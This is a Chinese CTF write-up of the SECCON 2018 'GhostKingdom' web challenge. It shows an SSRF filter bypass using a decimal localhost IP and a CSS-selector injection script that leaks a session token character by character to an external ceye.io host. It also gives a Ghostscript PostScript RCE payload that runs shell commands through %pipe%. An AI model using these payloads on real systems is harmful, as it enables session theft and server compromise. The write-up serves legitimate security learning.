2018 SECCON CTF—GhostKingdom Writeup

阅读量    36095 | 评论 5   稿费 300

分享到: QQ空间 新浪微博 微信 QQ facebook twitter

SECCON CTF的这WEB题比较有趣,结合了CSS注入和GhostScript的RCE,都是比较新的东西,现将过程整理和记录作为分享和总结:

 

0x01 探索功能与初步思路

访问题目,首先是提示了FLAG所在路径就是./FLAG/
屏幕快照 2018-10-29 上午1.14.33.png

点击进入TOP后,进入到一个登录页面,具有基础的登录和注册功能
屏幕快照 2018-10-29 上午1.15.50.png

经过测试,登录和注册功能不存在SQL注入,于是尝试注册账号并且登录,登录后页面内容如下:
屏幕快照 2018-10-29 上午1.18.55.png

登录的用户提供了两个功能,分别是给管理员留言,以及远程访问一个URL并将访问页面截图返回
上传图片功能被限制,提示是:

Only for users logged in from the local network

1 留言功能页面(自定义CSS)

屏幕快照 2018-10-29 上午1.21.09.png

留言选择Emergency时,进入预览页面后如下所示,其中有个css参数是base64编码过的,比较引人注意:
屏幕快照 2018-10-29 上午1.25.35.png

将base64解码后可以看到,是一段CSS代码,并且内容出现在HTML页面中,这是一个重要的点!意味着可能存在XSS

&css=c3BhbntiYWNrZ3JvdW5kLWNvbG9yOnJlZDtjb2xvcjp5ZWxsb3d9
解码后:span{background-color:red;color:yellow}

屏幕快照 2018-10-29 上午1.33.09.png

尝试插入其他内容打XSS,如JS标签,但是输出点对内容进行了实体化编码,无法绕过
应该是只能通过CSS做些事情了!
屏幕快照 2018-10-29 上午1.34.24.png

2 访问提交的URL并反馈截图的页面(SSRF)

屏幕快照 2018-10-29 上午1.22.38.png

以www.baidu.com为例,测试返回结果,返回了访问百度页面的截图
屏幕快照 2018-10-29 上午1.41.11.png

测试访问CEYE,查看访问记录
屏幕快照 2018-10-29 上午1.49.46.png

3 上传图片功能被限制

这里存在的上传图片功能是未开启的,提示需要从本地网络登录的用户才能使用,首先尝试了使用XXF(X-Forwarded-For)等伪造头进行绕过,但是不能成功

自然地,想到了上面第2点提到的存在SSRF,是否能够通过第2点的功能来从本地登录呢?查看用户登录页面的请求,果然是GET形式的,这样就方便通过第2点功能来SSRF从本地登录用户了
屏幕快照 2018-10-29 上午1.54.21.png

不过,如果在URL中存在如127、local等会被拦截
屏幕快照 2018-10-29 上午1.58.08.png

这里可以使用数字IP地址进行绕过

http://2130706433/?user=yunsle&pass=123456&action=login&action=sshot2

屏幕快照 2018-10-29 上午1.59.46.png

返回的截图中,可以看到成功了,图片上传的功能是正常开启的,但是通过截图是看不到图片上传的URL的,接下来怎么样才能获取到图片上传功能的URL成为了关键点
屏幕快照 2018-10-29 上午2.01.43.png

 

0x02 CSS注入-爆破CSRF Token

到这里陷入了僵局,似乎SSRF已经不能做到更多了,但是却指引了思路
从功能来看,现在只有之前挖掘的CSS任意注入还没有发挥作用。如果能够在刚刚的页面上,配合SSRF和XSS,能够轻松获得服务器端以本地身份登录的用户的COOKIE,这样可能可以直接伪造凭证登录,看到上传图片的功能。
但是这里似乎XSS行不通,怎么样才能利用上呢?
尝试了在CSS中执行javascript,如

background: url(javascript:alert(1))

但是并不能执行js代码(存在疑惑),到这里,只能完全放弃使用js的想法,开始寻找用CSS来打COOKIE的可能。。。

这时,有个细节引起了注意,在CSS样式存在问题的页面,用于防范CSRF的input标签的value值,和SESSION的COOKIE值是一样的
屏幕快照 2018-10-29 上午2.06.59.png

那么,如果获取到这个input标签的value值,就能拿到COOKIE了!
如何能够通过CSS样式,来获取这个input标签的value值呢?
这里可以参考:https://www.freebuf.com/articles/web/162445.html

主要思路是利用CSS选择器匹配,来发起请求:

input[value^="6703"] {background-image:url("http://mhv3ii.ceye.io/6703");}

我的简陋逐位爆破脚本,配合CEYE一起看(耗时比较久!):

import base64
import requests
import time

url = "http://ghostkingdom.pwn.seccon.jp/?url="

cookie = {
    "CGISESSID":"db579456a3a04ae86d19aa"
}

for c in range(48,59):
    print(chr(c))
    css = "span{color:yellow} input[value^='fea743ebc7b8ac35bde12a"+chr(c)+"'] {background-image:url('http://mhv3ii.ceye.io/fea743ebc7b8ac35bde12a"+chr(c)+"');}"
    css_b64 = base64.b64encode(css)
    r_url = "http%3A%2F%2F2130706433%2F%3Fcss%3D" + css_b64 + "%26msg%3D%26action%3Dmsgadm2&action=sshot2"
    res = requests.get(url=url+r_url, cookies=cookie)
    print(css_b64)
    print(res.content)
    time.sleep(30)

for c in range(97,127):
    print(chr(c))
    css = "span{color:yellow} input[value^='fea743ebc7b8ac35bde12a"+chr(c)+"'] {background-image:url('http://mhv3ii.ceye.io/fea743ebc7b8ac35bde12a"+chr(c)+"');}"
    css_b64 = base64.b64encode(css)
    r_url = "http%3A%2F%2F2130706433%2F%3Fcss%3D" + css_b64 + "%26msg%3D%26action%3Dmsgadm2&action=sshot2"
    res = requests.get(url=url+r_url, cookies=cookie)
    print(css_b64)
    print(res.content)
    time.sleep(30)

屏幕快照 2018-10-29 上午2.26.43.png

最终拿到了COOKIE,并且伪造该COOKIE成功登陆:
屏幕快照 2018-10-29 上午12.50.31.png

 

0x03 GhostScript的RCE漏洞

图片上传功能提示上传Jpeg图片文件
屏幕快照 2018-10-29 上午12.50.43.png

上传后存在一个将该Jpeg文件转为Gif文件的功能,查看转换的URL:

http://ghostkingdom.pwn.seccon.jp/ghostMagick.cgi?action=convert

其中ghostMagick.cgi引起了注意,正好查看最近的GhostScript存在一个RCE漏洞
可以参考:https://www.anquanke.com/post/id/157380
构造利用的Jpeg文件,通过ls ./FLAG查看FLAG目录:

%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%ls FLAG) currentdevice putdeviceprops

屏幕快照 2018-10-29 上午1.04.42.png

RCE成功返回执行结果,访问FLAG路径下的FLAGflagF1A8.txt即可拿到flag
屏幕快照 2018-10-29 上午1.04.25.png

0x04 Reference

https://www.freebuf.com/articles/web/162445.html
https://www.anquanke.com/post/id/157380

分享到: QQ空间 新浪微博 微信 QQ facebook twitter
|推荐阅读
|发表评论
|评论列表
加载更多